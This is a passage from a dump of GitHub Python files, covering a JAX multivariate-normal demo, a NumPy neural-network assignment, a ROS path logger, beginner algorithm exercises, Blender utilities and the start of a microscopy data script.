it if you mutate the tree def of things in a few\ncases, so it's good practice - despite being inefficient - to always copy\nbefore mutation. That's how these functions are immutable.)\n\"\"\"\n\n# %%\n\ny = x_dict.lin_op(lambda x: assign(x, \"c\", jnp.array([[x[\"b\"], -x[\"b\"]], [3.0 * x[\"b\"], x[\"b\"]]])))\n\nprint(y.mean_as())\nprint(y.covariance_as())\n\n# %%\n\n\"\"\"\nThis covariance is a bit of a mess, so let's sample to get a sense of what's going on instead.\n\"\"\"\n\n# %%\n\nsamples = y.sample(jax.random.PRNGKey(2), (4,))\nsamples.shape\n\n# %%\n\n\"\"\"\nSamples are returned in flattened shape, but we can transform into the data\nshape if desired.\n\"\"\"\n\n# %%\n\nsamples_dict = y.flat_value_config.as_tree(samples, dim=-1)\nsamples_dict\n\n# %%\n\n\"\"\"\nThe details of maintaining a non-flat representation are handled by the `flat_value_config`.\n\"\"\"\n\n# %%\n\n\"\"\"\nOther operations are also supported of course.\n\"\"\"\n\n# %%\n\nadd_vals = x_dict.add(lambda x: operate(x, \"a\", \"a\", lambda l: l + 4))\nprint(x_dict.mean_as())\nprint(add_vals.mean_as())\nprint(x_dict.covariance_as()[\"a\"])\nprint(add_vals.covariance_as()[\"a\"])\n\n# %%\n\nset_vals = x_dict.set(\n set_to=2.7, setter=lambda x, set_to: operate(x, \"a\", \"a\", lambda x: jnp.broadcast_to(set_to, x.shape))\n)\nprint(x_dict.mean_as())\nprint(set_vals.mean_as())\nprint(x_dict.covariance_as()[\"a\"])\nprint(set_vals.covariance_as()[\"a\"])\n\n# %%\n\nset_vals = x_dict.set(\n # the set to value can be an arbitrary pytree\n set_to={\"first\": 2.7, \"second\": 9.1},\n setter=lambda x, set_to: (\n operate_f(\"a\", \"a\", lambda v: jnp.broadcast_to(set_to[\"first\"], v.shape))\n @ operate_f(\"b\", \"b\", lambda v: jnp.broadcast_to(set_to[\"second\"], v.shape))\n )(x),\n)\nprint(x_dict.mean_as())\nprint(set_vals.mean_as())\nprint(x_dict.covariance_as())\nprint(set_vals.covariance_as())\n\n\n# %%\n\n\"\"\"\nNote that if functions passed to various operations don't do 'what they're\nsupposed to do', then you'll get incorrect results. 
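Nothing is checked at\nruntime - the mean and covariance are simply pushed through whatever function\nyou supply. 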
For instance, don't pass a\nnon-linear function to .lin_op (affine isn't ok - just linear!).\n\nFunctions with such demands have docstrings explaining what's up.\n\"\"\"\n\n# %%\n\n# a : (2,)\n# b : (3,2)\nvals = MultivariateNormal(jnp.ones((8,)), jnp.eye(8)).lin_op(lambda x: {\"a\": x[:2], \"b\": x[2:].reshape(3, 2)})\n\na, b = vals.mean_as()[\"a\"], vals.mean_as()[\"b\"]\njnp.einsum(a, [\"n\"], b, [\"m\", \"n\"], [\"m\"])\n\n# %%\n\n# compare to einsum above\nmulled = vals.mul_select(\n selector_l=lambda x: x[\"a\"],\n l_axes_names=[\"n\"],\n selector_r=lambda x: x[\"b\"],\n r_axes_names=[\"m\", \"n\"],\n out_axes_names=[\"m\"],\n combine=lambda new, _: new,\n)\nmulled.covariance_as()\n\n# %%\n\n\"\"\"\nA decent number of examples for various operations and immutable_dict\noperations can be found by going through the apply_to_normal function in\nUnidirectionalAttn.\n\"\"\"\n\n\n# %%\n\n\"\"\"\nAnother operation of interest is conditioning.\n\"\"\"\n\n# %%\n\nto_cond_x = MultivariateNormal(jnp.array([1, 2.0]), jnp.array([[1, 0.8], [0.8, 3.0]])).lin_op(\n lambda x: {\"a\": x[0], \"b\": x[1]}\n)\ncond_x = to_cond_x.condition(selector=lambda x: x[\"a\"], value=0.0)\nprint(cond_x.mean_as())\nprint(cond_x.covariance_as())\nprint(cond_x.sample(jax.random.PRNGKey(2838), (10,)))\n\n# %%\n\n\"\"\"\nWe can condition on a == b by setting the difference equal to zero.\n\nNumerics on this aren't great...\n\"\"\"\n\n# %%\n\neq_cond_x = to_cond_x.condition(lambda x: x[\"a\"] - x[\"b\"], 0.0)\nprint(eq_cond_x.sample(jax.random.PRNGKey(2838), (10,)))\n\n# %%\n\n\"\"\"\nWe can also select and condition on a pytree if desired.\n\"\"\"\n\n# %%\n\n\nto_cond_x = MultivariateNormal(jnp.zeros((3,)), jnp.eye(3)).lin_op(\n lambda x: {\n \"a\": x[0] + 3 * x[2],\n \"b\": x[0] + x[1] * 2 - x[2],\n \"c\": x[2],\n }\n)\ncond_x = to_cond_x.condition(\n selector=keep_only_f([\"b\", \"c\"]),\n value={\"b\": -10.0, \"c\": 12.0},\n # Passing a setter will increase numerical accuracy when we just select a\n # subset - try removing the setter.\n setter=lambda x, set_to: (\n assign_f(\"b\", set_to[\"b\"], check_present=True) @ assign_f(\"c\", set_to[\"c\"], check_present=True)\n )(x),\n)\nprint(cond_x.mean_as())\nprint(cond_x.covariance_as())\nprint(cond_x.sample(jax.random.PRNGKey(2838), (10,)))\n","repo_name":"redwoodresearch/interp","sub_path":"interp/demos/simple_multivariate_normal.py","file_name":"simple_multivariate_normal.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"71884318440","text":"from layers import *\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n\ndef initialize_parameters(layer_dims):\n \"\"\"\n input:\n an array of the dimensions of each layer in the network (layer 0 is the size of the flattened input, layer L is the output sigmoid)\n output:\n a dictionary containing the initialized W and b parameters of each layer (W1...WL, b1...bL).\n \"\"\"\n params = {}\n layer_input_dim = layer_dims[0]\n num_classes = layer_dims[-1]\n\n # input-> hidden_layer_1 -> hidden_layer_2 -> ... 
-> hidden_layer_last\n for idx, dim in enumerate(layer_dims[1:]): # enumerate all hidden layers\n layer_num = str(idx+1)\n #params['W' + layer_num] = np.random.randn(layer_input_dim, dim)\n params['W' + layer_num] = np.random.randn(layer_input_dim, dim) * np.sqrt(2/layer_input_dim)\n params['b' + layer_num] = np.zeros(dim)\n layer_input_dim = dim\n\n # hidden_layer_last -> output\n num_layers = len(layer_dims)\n params['W' + str(num_layers)] = np.random.randn(layer_input_dim, num_classes) * np.sqrt(1/layer_input_dim)\n params['b' + str(num_layers)] = np.zeros(num_classes)\n\n return params\n\n\ndef L_model_forward(X, parameters, use_batchnorm, dropout):\n \"\"\"\n forward propagation for the [LINEAR->RELU]*(L-1)->LINEAR->SOFTMAX computation\n\n :param X: the data, numpy array of shape (input size, number of examples)\n :param parameters: the initialized W and b parameters of each layer\n :param use_batchnorm: a boolean flag used to determine whether to apply batchnorm after the activation\n :param dropout: Scalar between 0 and 1 giving dropout strength.\n If dropout=1 then the network should not use dropout at all.\n :return: (the last post-activation value , a list of all the cache objects)\n \"\"\"\n layer_input = X\n caches = []\n dropout_cache = {} # cache for dropout layer\n batchnorm_cache = {} # cache for batchnorm layer\n num_layers = len([key for key in parameters.keys() if key.startswith('W')])\n use_dropout = dropout != 1\n\n for layer_idx in range(1, num_layers):\n W, b = parameters['W' + str(layer_idx)], parameters['b' + str(layer_idx)]\n layer_input, layer_cache, batchnorm_cache[layer_idx] = linear_activation_forward(layer_input, W, b, 'relu', use_batchnorm)\n caches.append(layer_cache)\n\n if use_dropout:\n layer_input, dropout_cache[layer_idx] = dropout_forward(layer_input, dropout)\n\n # last layer\n W, b = parameters['W' + str(num_layers)], parameters['b' + str(num_layers)]\n last_post_activation, layer_cache, _ = linear_activation_forward(layer_input, W, b, 'softmax', False)\n caches.append(layer_cache)\n\n return last_post_activation, caches, batchnorm_cache, dropout_cache\n\n\ndef compute_cost(AL, Y):\n \"\"\"\n Implement the cost function defined by equation. The requested cost function is categorical cross-entropy loss.\n\n :param AL: – probability vector corresponding to your label predictions, shape (num_of_classes, number of examples)\n :param Y: the labels vector (i.e. 
the ground truth)\n :return: the cross-entropy cost\n \"\"\"\n return - np.sum((Y * np.log(AL))) / Y.shape[0]\n\n\ndef L_model_backward(AL, Y, caches, use_batchnorm, batchnorm_cache, dropout_cache):\n \"\"\"\n Backward propagation process for the entire network.\n\n :param AL: the probabilities vector, the output of the forward propagation (L_model_forward)\n :param Y: the true labels vector (the \"ground truth\" - true classifications)\n :param caches: list of caches containing for each layer: a) the linear cache; b) the activation cache\n :param batchnorm_cache: the cache for the batchnorm\n :param dropout_cache: the cache for the dropout\n :return: a dictionary with the gradients\n \"\"\"\n\n grads = {}\n num_layers = len(caches)\n use_dropout = len(dropout_cache) != 0\n\n last_layer_idx = num_layers\n dA, dW, db = linear_backward(AL - Y, caches[-1]['linear_cache'])\n grads['dA' + str(last_layer_idx)] = dA\n grads['dW' + str(last_layer_idx)] = dW\n grads['db' + str(last_layer_idx)] = db\n\n for layer_idx in reversed(range(1, num_layers)):\n if use_dropout:\n dA = dropout_backward(dA, dropout_cache[layer_idx])\n\n dA, dW, db = linear_activation_backward(dA, caches[layer_idx - 1], \"relu\", use_batchnorm, batchnorm_cache[layer_idx])\n grads['dA' + str(layer_idx)] = dA\n grads['dW' + str(layer_idx)] = dW\n grads['db' + str(layer_idx)] = db\n\n return grads\n\n\ndef update_parameters(parameters, grads, learning_rate):\n \"\"\"\n Updates parameters using gradient descent\n\n :param parameters: a python dictionary containing the DNN architecture’s parameters\n :param grads: a python dictionary containing the gradients (generated by L_model_backward)\n :param learning_rate: the learning rate used to update the parameters (the “alpha”)\n :return: the updated values of the parameters object provided as input\n \"\"\"\n\n num_layers = len([key for key in parameters.keys() if key.startswith('W')])\n\n for layer_idx in range(1, num_layers + 1):\n old_W, dW = parameters['W' + str(layer_idx)], grads['dW' + str(layer_idx)]\n old_b, db = parameters['b' + str(layer_idx)], grads['db' + str(layer_idx)]\n\n parameters['W' + str(layer_idx)] = old_W - learning_rate * dW\n parameters['b' + str(layer_idx)] = old_b - learning_rate * db\n\n return parameters\n\ndef L_layer_model(X, Y,\n layers_dims,\n learning_rate,\n num_iterations,\n batch_size,\n use_batchnorm,\n min_epochs,\n dropout=1):\n \"\"\"\n {affine - [batch/layer norm] - relu - [dropout]} x (L - 1) - affine - softmax\n\n :param X: the input data, a numpy array of shape (height*width, number_of_examples)\n :param Y: the “real” labels of the data, a vector of shape (num_of_classes, number of examples)\n :param layers_dims: a list containing the dimensions of each layer, including the input\n :param learning_rate: the learning rate\n :param num_iterations: number of iterations\n :param batch_size: the number of examples in a single training batch.\n :param use_batchnorm: use batchnorm or not\n :param min_epochs: minimum number of epochs to execute before checking stopping criteria\n :param dropout: Scalar between 0 and 1 giving dropout strength.\n If dropout=1 then the network should not use dropout at all.\n :return: (parameters, costs, val_accuracies, train_accuracies, training_last_accuracy, validation_last_accuracy) -\n the parameters learnt by the system during the training (the same parameters\n that were updated in the update_parameters function) and the values of the cost\n function (calculated by the compute_cost function). One value is to be saved\n after each 100 training iterations (e.g. 3000 iterations -> 30 values).\n val_accuracies - accuracy per 100 iterations on the validation set\n train_accuracies - accuracy per 100 iterations on the training set\n training_last_accuracy - final accuracy on the training set\n validation_last_accuracy - final accuracy on the validation set\n \"\"\"\n # split to train and val\n X_train, X_val, y_train, y_val = train_test_split(X, Y,\n test_size=0.2,\n stratify=Y, random_state=42)\n\n # initialization\n parameters = initialize_parameters([X.shape[1]] + layers_dims)\n costs = []\n accs_per_100_iterations = []\n costs_per_100_iterations = []\n train_accs_per_100_iterations = []\n\n iterations_counter = 0\n epoch_counter = 0\n val_acc_no_improvement_count = 0\n best_val_acc_value = 0\n\n while iterations_counter < num_iterations:\n for X_batch, Y_batch in next_batch(X_train, y_train, batch_size):\n\n # forward pass\n AL, caches, batchnorm_cache, dropout_caches = L_model_forward(X_batch, parameters, use_batchnorm, dropout)\n\n # compute the cost and document it\n cost = compute_cost(AL, Y_batch)\n costs.append(cost)\n\n # backward pass\n grads = L_model_backward(AL, Y_batch, caches, use_batchnorm, batchnorm_cache, dropout_caches)\n\n # update parameters\n parameters = update_parameters(parameters, grads, learning_rate)\n\n iterations_counter += 1\n\n # document performance every 100 iterations\n val_acc = predict(X_val, y_val, parameters, use_batchnorm)\n if iterations_counter % 100 == 0:\n accs_per_100_iterations.append(val_acc)\n train_acc = predict(X_train, y_train, parameters, use_batchnorm)\n train_accs_per_100_iterations.append(train_acc)\n costs_per_100_iterations.append(cost)\n print('iteration step: {} | cost: {}'.format(iterations_counter, cost))\n\n # check if accuracy improved\n if val_acc > best_val_acc_value:\n best_val_acc_value = val_acc\n val_acc_no_improvement_count = 0\n val_acc_no_improvement_count += 1\n\n # check stop criteria\n if val_acc_no_improvement_count >= 100 and epoch_counter >= min_epochs:\n train_acc = predict(X_train, y_train, parameters, use_batchnorm)\n val_acc = predict(X_val, y_val, parameters, use_batchnorm)\n return parameters, costs_per_100_iterations, accs_per_100_iterations, train_accs_per_100_iterations, train_acc, val_acc\n epoch_counter += 1\n\n train_acc = predict(X_train, y_train, parameters, use_batchnorm)\n val_acc = predict(X_val, y_val, parameters, use_batchnorm)\n return parameters, costs_per_100_iterations, accs_per_100_iterations, train_accs_per_100_iterations, train_acc, val_acc\n\n\ndef predict(X, Y, parameters, use_batchnorm):\n \"\"\"\n Description:\n The function receives input data and the true labels and calculates the accuracy of\n the trained neural network on the data.\n Input:\n X – the input data, a numpy array of shape (height*width, number_of_examples)\n Y – the “real” labels of the data, a vector of shape (num_of_classes, number of examples)\n parameters – a python dictionary containing the DNN architecture’s parameters\n Output:\n accuracy – the accuracy measure of the neural net on the provided data (i.e. the\n percentage of the samples for which the correct label receives over 50% of the\n confidence score). 
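Internally, the predicted class is the argmax of the network's scores,\n compared against the argmax of the one-hot labels via sklearn's accuracy_score. 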
Use the softmax function to normalize the output values.\n \"\"\"\n scores, _, _, _ = L_model_forward(X, parameters, use_batchnorm=use_batchnorm, dropout=1) # test time\n predictions = np.argmax(scores, axis=1)\n Y_flatten = np.argmax(Y, axis=1)\n return accuracy_score(Y_flatten, predictions)\n\n\ndef next_batch(X, y, batchSize):\n # loop over our dataset X in mini-batches of size batchSize\n for i in np.arange(0, X.shape[0], batchSize):\n # yield a tuple of the current batched data and labels\n yield (X[i: i+batchSize, :], y[i: i+batchSize, :])","repo_name":"elisim/Deep-Learning-Intro","sub_path":"assignment1/fc_net.py","file_name":"fc_net.py","file_ext":"py","file_size_in_byte":11568,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"39843850042","text":"#! /usr/bin/env python\n\nimport rospy\nfrom nav_msgs.msg import Odometry\nimport json\nfrom nav_msgs.msg import Path\nimport math\n\nx = [0.0] # latest x coordinate, updated in the callback\ny = [0.0] # latest y coordinate, updated in the callback\n\ndef callback(msg):\n\n # read previous data\n print('here')\n\n with open('sample.json', 'r') as openfile:\n jsonObject = json.load(openfile)\n\n # append the current coordinates\n x[0] = msg.poses[0].pose.position.x\n y[0] = msg.poses[0].pose.position.y\n\n dist = math.sqrt(x[0]**2) # absolute value of the x coordinate\n\n (jsonObject['xCoordinates']).append(dist)\n\n #(jsonObject['xCoordinates']).append(msg.poses[0].pose.position.x)\n # (jsonObject['yCoordinates']).append(msg.poses[0].pose.position.y)\n\n # write the updated data into json file\n with open(\"sample.json\", \"w\") as outfile:\n json.dump(jsonObject, outfile)\n\n\nif __name__ == '__main__':\n # seed the data file with empty coordinate lists before the callbacks read it\n jsonObject = {'xCoordinates': [], 'yCoordinates' : []}\n with open('sample.json', 'w') as outfile:\n json.dump(jsonObject, outfile)\n\n rospy.init_node('global_Subscriber_odom') #change name\n\n sub = rospy.Subscriber('/move_base_node/DWAPlannerROS/local_plan',Path,callback) # 1_DWA\n #sub=rospy.Subscriber('/move_base_node/TebLocalPlannerROS/local_plan',Path,callback) #1_TEB \n\n #sub=rospy.Subscriber('/mobile_base_controller/odom',Odometry,callback) #\n rospy.spin()\n","repo_name":"mfouad992/Multi_Robot_Mohamed","sub_path":"src/mir/mir_gazebo/launch/Date_recorder/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40308179013","text":"# Separate the neg, pos, and zero\n# Input : 10 -1 -3 -4 0 0 45 42\n# Output : [10, 45, 42] [-1, -3, -4] [0, 0]\ndef p1():\n ls = list(map(int,input().split()))\n n = len(ls)\n pos = [0]*n\n neg = [0]*n\n zero = [0]*n\n p,n,z=0,0,0\n for i in ls:\n if i==0:\n zero[z] = i\n z+=1\n elif i<=0:\n neg[n]=i\n n+=1\n else:\n pos[p] = i\n p+=1\n print(pos[:p],neg[:n],zero[:z])\n\n# p1()\n\n\n# linear search\n# 4 5 8 10 11 15 1 \ndef p2():\n ls = list(map(int,input().split()))\n print(ls)\n n = len(ls)\n key = int(input(\"Enter The Element To Search = \"))\n for i in range(n):\n if(ls[i]==key):\n print(key,\"Found at Index \",i)\n\n# p2()\n\n\n\n# binary search\ndef p3():\n ls = list(map(int,input().split()))\n print(ls)\n s = 0 \n e = len(ls)-1\n key = int(input(\"Enter The Element To Search = \"))\n while s<=e :\n mid = (s+e)//2\n if ls[mid] == key:\n print(f\"Element is present at {mid}\")\n break\n elif ls[mid]< key:\n s = mid + 1\n else:\n e = mid-1\n else:\n print(\"Not Present\")\n\n\n# given list is palindrome\n\n# ls = list(map(int,input().split()))\n# i = 0\n# j=len(ls)-1\n# while(i<=j):\n# if ls[i]!=ls[j]:\n# print(\"Not Palindrom list\")\n# break\n# i+=1\n# j-=1\n# else:\n# print(\"
Palindrom list\")\n\n\n# dictionary\nd = {\n \"name\":\"ajay devgan\",\n \"age\": 55,\n \"salary\":30000,\n \"experienc\":10\n}\n\nfor key, val in d.items():\n print(key,val)\n\n\nls = [10,20,10,20,30,20,10,]\n\n\n","repo_name":"vivekPatil45/Python-ESDP","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71335772840","text":"# 277. Find the Celebrity\n# Array\n\n# TLE\nclass Solution1:\n def findCelebrity(self, n: int) -> int:\n self.knowOthers = collections.defaultdict(int)\n self.otherKnows = collections.defaultdict(int)\n notC = set()\n \n for i in range(n-1):\n for j in range(i+1, n):\n if knows(i, j):\n self.knowOthers[i] += 1\n self.otherKnows[j] += 1\n notC.add(i)\n if knows(j, i):\n self.knowOthers[j] += 1\n self.otherKnows[i] += 1\n notC.add(j)\n \n if len(notC) == n:\n return -1\n \n for i in range(n):\n if i not in notC:\n if self.knowOthers.get(i, 0) == 0 and self.otherKnows[i] == n-1:\n return i\n return -1\n\n\n# https://leetcode.com/problems/find-the-celebrity/solution/\n# runtime: O(n)\nclass Solution2:\n def findCelebrity(self, n: int) -> int:\n c = 0\n for i in range(1, n):\n if knows(c, i):\n c = i\n \n for j in range(n):\n if j == c:\n continue\n if knows(c, j) or not knows(j, c):\n return -1\n \n return c","repo_name":"junyang10734/leetcode-python","sub_path":"277.py","file_name":"277.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18723774861","text":"def anss(arr) :\n ran = 0\n ans = 0\n # print(len(arr))\n print(arr)\n while ans < sum:\n ans = ans + arr[ran]\n ran = ran + 1\n # if ans > sum :\n # print(\"Break\")\n return ans, arr[0], ran\n\nsum = int(input(\"Enter the sum\"))\n# arr = []\n# arrRange = int(input(\"enter the range of the array\"))\n# for i in range(0, arrRange) :\n# getIn = int(input(\"Enter elements in an array\"))\n# arr.append(getIn)\narr = [1,2,3,7,5,6,7,8,9,10]\ncop = arr.copy()\n\nnav = 0\nfis = 0\ncheckValue = 0\nfor i in arr :\n checkValue = checkValue + i\nprint(checkValue)\nif sum <= checkValue :\n while nav < sum:\n nav = nav + arr[fis]\n fis = fis + 1\n\n name = anss(arr)\n\n if nav == sum:\n print(1, fis)\n else:\n count = 0\n while name[0] != sum:\n count = count + 1\n arr.pop(0)\n name = anss(arr)\n print(name[0])\n\n if name[0] == sum:\n value = cop.index(name[1])\n print(value + 1, value + name[2])\n else:\n print(\"The sum is not present in the range of numbers given\")\n # if count > len(cop) :\n # print(cop.index(name[1]) + 1, count + 2)\n # else :\n # print(cop.index(name[1]) + 1, count + 1)\nelse:\n print(\"The sum is not present in the range of numbers given\")\n","repo_name":"Muralijeya/pythonProject","sub_path":"amazon_Problems.py","file_name":"amazon_Problems.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11366826783","text":"import bpy\nimport re\nimport numpy as np\n\n\"\"\"\nLibrary collecting general utils in math or Blender API that are used frequently throughout the code but aren't tied to a specific task\n\"\"\"\n\ndef setSelectOfObjectAndChildren(obj, selectState):\n \"\"\"\n Sets a node and its hierarchy to a given selectState (True or False)\n \"\"\"\n obj.select_set(selectState)\n \n for child in obj.children:\n setSelectOfObjectAndChildren(child, 
selectState)\n\ndef setNewParent(obj, newParent, keep_transform=False):\n bpy.ops.object.select_all(action='DESELECT')\n\n obj.select_set(True)\n newParent.select_set(True)\n bpy.context.view_layer.objects.active = newParent\n\n bpy.ops.object.parent_set(keep_transform=keep_transform)\n\ndef getChildrenWithNameContaning(parent, stringToSearch):\n \"\"\"\n Returns all children of an objects whose names contain a user-provided string\n \"\"\"\n return [child for child in parent.children if (re.search(stringToSearch, child.name) != None)]\n\ndef getChildWithNameContaining(parent, stringToSearch):\n \"\"\"\n Returns a child whose name contains a given string, and None if no such child exist/more than one exists\n \"\"\"\n foundChildren = getChildrenWithNameContaning(parent, stringToSearch)\n \n if len(foundChildren) == 0:\n #No child has the name\n #warnings.warn(\"No child of '{}' with name containing '{}' found.\".format(parent.name, stringToSearch))\n return None\n elif len(foundChildren) == 1:\n #We found exactly one child with this name\n return foundChildren[0]\n else:\n #More than one child with this name was found\n #warnings.warn(\"More than one child of '{}' with name containing '{}' found.\".format(parent.name, stringToSearch))\n return None\n\ndef selectObjAndHierarchy(obj):\n bpy.context.view_layer.objects.active = obj\n obj.select_set(True)\n bpy.ops.object.select_hierarchy(direction='CHILD', extend=True)\n\ndef deleteObjAndHierarchy(obj):\n bpy.ops.object.select_all(action='DESELECT')\n selectObjAndHierarchy(obj)\n bpy.ops.object.delete()\n\ndef duplicateObjectAndHierarchy(obj, linked=False):\n # Selecting only the object and its hiearchy, and duplicating it\n bpy.ops.object.select_all(action='DESELECT')\n selectObjAndHierarchy(obj)\n bpy.ops.object.duplicate(linked=True)\n\n # Returning the duplicate root object, that is the one sharing the same data as the original root object\n dupObj = None\n dupObjsData = [ob.data for ob in bpy.context.selected_objects]\n if not obj.data in dupObjsData:\n raise Exception(\"For some reason, no duplicate object carries the original data. 
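The duplicate root is identified by matching its data block against the original's. 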
Check if objects were properly selected or if the duplication was set to 'Linked'.\")\n\n dupObj = bpy.context.selected_objects[dupObjsData.index(obj.data)]\n\n # If the user specified for the duplicate not to be linked, we make its properties local\n if not linked:\n bpy.ops.object.make_single_user(object=True, obdata=True, material=True, animation=True, obdata_animation=True)\n\n return dupObj\n\ndef getSphericalCoordinates(radius : float, theta : float, phi : float):\n return radius * np.array([np.cos(phi) * np.sin(theta), np.sin(phi) * np.sin(theta), np.cos(theta)])\n\ndef lookAtFromPos(targetPos, lookPos, upVector = np.array([0.0, 0.0, 1.0])):\n \"\"\"\n Returns the transform to apply to an object so that it looks towards targetPos, from a given position lookPos and with a given up vector upVector\n :param nparray targetPos: Position to which to look\n :param nparray lookPos: Position from which to look\n :param nparray upVector: The world up vector\n \"\"\"\n zAxis = targetPos - lookPos\n zAxis = zAxis / np.linalg.norm(zAxis)\n\n yAxis = None\n usedUpVec = np.array(upVector)\n if abs(np.dot(zAxis, usedUpVec)) == 1.0:\n #If the zAxis and up vector share the same direction, we find an arbitrary yAxis orthogonal to zAxis\n yAxis = np.array([zAxis[1], -zAxis[0], 0.0]) if (zAxis[1] != 0.0 or zAxis[0] != 0.0) else np.array([zAxis[2], 0.0, -zAxis[0]])\n else:\n yAxis = np.cross(zAxis, usedUpVec)\n yAxis = yAxis / np.linalg.norm(yAxis)\n\n xAxis = np.cross(zAxis, yAxis)\n xAxis = xAxis / np.linalg.norm(xAxis)\n\n transform = np.concatenate([yAxis, -xAxis, -zAxis, lookPos]).reshape((4, 3)).T\n transform = np.concatenate([transform, np.array([[0.0, 0.0, 0.0, 1.0]])])\n \n return transform.T","repo_name":"TheFamousRat/ChessR","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7824944133","text":"import os\nimport sys\nimport subprocess\nimport re\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.messagebox import askyesno\nfrom natsort import natsorted\nfrom tqdm import tqdm\n\nscript_dirpath = os.path.dirname(os.path.realpath(__file__))\nsrc_path = os.path.dirname(script_dirpath)\nsys.path.insert(0, src_path)\n\nimport load, prompts, apps, core\n\nclass beyond_listdir_pos:\n def __init__(self, folder_path, spotMAX_data_foldername):\n self.bp = apps.tk_breakpoint()\n self.folder_path = folder_path\n self.TIFFs_paths = []\n self.count_recursions = 0\n self.spotMAX_data_foldername = spotMAX_data_foldername\n self.listdir_recursion(folder_path)\n if not self.TIFFs_paths:\n raise FileNotFoundError(f'Path {folder_path} is not valid!')\n self.all_exp_info = self.count_analysed_pos()\n\n def listdir_recursion(self, folder_path):\n if os.path.isdir(folder_path):\n listdir_folder = natsorted(os.listdir(folder_path))\n contains_pos_folders = any([name.find('Position_')!=-1\n for name in listdir_folder])\n if not contains_pos_folders:\n contains_TIFFs = any([name=='TIFFs'\n for name in listdir_folder])\n contains_mitoQ_data = any([name==self.spotMAX_data_foldername\n for name in listdir_folder])\n rec_count_ok = self.count_recursions < 15\n if contains_TIFFs and contains_mitoQ_data and rec_count_ok:\n self.TIFFs_paths.append(f'{folder_path}/'\n f'{self.spotMAX_data_foldername}')\n elif contains_TIFFs and rec_count_ok:\n self.TIFFs_paths.append(f'{folder_path}/TIFFs')\n elif 
rec_count_ok:\n for name in listdir_folder:\n subfolder_path = f'{folder_path}/{name}'\n self.listdir_recursion(subfolder_path)\n self.count_recursions += 1\n else:\n raise RecursionError(\n 'Recursion went too deep and was aborted. '\n 'Check that the experiment contains the TIFFs folder')\n else:\n exp_path = os.path.dirname(os.path.dirname(folder_path))\n contains_mitoQ_data = any([name==self.spotMAX_data_foldername\n for name in listdir_folder])\n self.TIFFs_paths.append(exp_path)\n\n def get_rel_path(self, path):\n rel_path = ''\n parent_path = path\n count = 0\n while parent_path != self.folder_path and count < 10:\n if count > 0:\n rel_path = f'{os.path.basename(parent_path)}/{rel_path}'\n parent_path = os.path.dirname(parent_path)\n count += 1\n rel_path = f'.../{rel_path}'\n return rel_path\n\n def count_analysed_pos(self):\n all_exp_info = []\n valid_TIFFs_path = []\n for path in self.TIFFs_paths:\n rel_path = self.get_rel_path(path)\n foldername = os.path.basename(path)\n if foldername == self.spotMAX_data_foldername:\n exp_info = f'{rel_path} (All Pos. DataFrames ALREADY generated)'\n else:\n exp_info = f'{rel_path} (DataFrames NOT present!)'\n all_exp_info.append(exp_info)\n return all_exp_info\n\ndef add_cca_info(pos_df, pos_cca_df):\n frames = pos_df.index.get_level_values(0)\n IDs = pos_df.index.get_level_values(1)\n if 'frame_i' in pos_cca_df.columns:\n pos_cca_df = pos_cca_df.reset_index().set_index(['frame_i', 'Cell_ID'])\n cc_stages = pos_cca_df['Cell cycle stage'].loc[(frames, IDs)]\n cc_nums = pos_cca_df['# of cycles'].loc[(frames, IDs)]\n relationships = pos_cca_df['Relationship'].loc[(frames, IDs)]\n relatives_IDs = pos_cca_df['Relative\\'s ID'].loc[(frames, IDs)]\n OFs = pos_cca_df['OF'].loc[(frames, IDs)]\n else:\n cc_stages = pos_cca_df['Cell cycle stage'].loc[IDs]\n cc_nums = pos_cca_df['# of cycles'].loc[IDs]\n relationships = pos_cca_df['Relationship'].loc[IDs]\n relatives_IDs = pos_cca_df['Relative\\'s ID'].loc[IDs]\n OFs = pos_cca_df['OF'].loc[IDs]\n pos_df['Cell Cycle Stage'] = cc_stages.to_list()\n pos_df['Cycle repetition #'] = cc_nums.to_list()\n pos_df['Relationship'] = relationships.to_list()\n pos_df['Relative\\'s ID'] = relatives_IDs.to_list()\n pos_df['OF'] = OFs.to_list()\n return pos_df\n\n\ndef check_IDs_match(pos_df, cca_df, cca_df_path, pos_df_path):\n IDs_match = [ID in cca_df.index for ID in pos_df.index.get_level_values(1)]\n if all(IDs_match):\n return True\n else:\n print(cca_df.index)\n print(pos_df.index.get_level_values(1))\n print(cca_df)\n print(pos_df)\n err = (f'Cell cycle stage analysis at\\n\\n'\n f'{cca_df_path}\\n\\n has IDs that do not match those of the '\n 'analysis file at:\\n\\n'\n f'{pos_df_path}\\n\\nRun cell cycle analysis again')\n tk.messagebox.showerror('IDs mismatch!', err)\n raise ValueError(err)\n\n\nclass replace_or_skip:\n def __init__(self):\n self.replace = False\n self.skip = False\n self.asked_once = False\n\n\n\n#expand dataframe beyond page width in the terminal\npd.set_option('display.max_columns', 20)\npd.set_option('display.max_rows', 300)\npd.set_option('display.precision', 3)\npd.set_option('display.expand_frame_repr', False)\n\n# Select experiment path\nsrc_listdir = os.listdir(src_path)\nmain_idx = [i for i, f in enumerate(src_listdir) if f.find('main_') != -1][0]\nmain_filename = src_listdir[main_idx]\nNUM = re.findall('v(\\d+).py', main_filename)[0]\nvNUM = f'v{NUM}'\nselected_path = prompts.folder_dialog(title=\n \"Select folder containing valid experiments\")\nspotMAX_data_foldername = ''\nif 
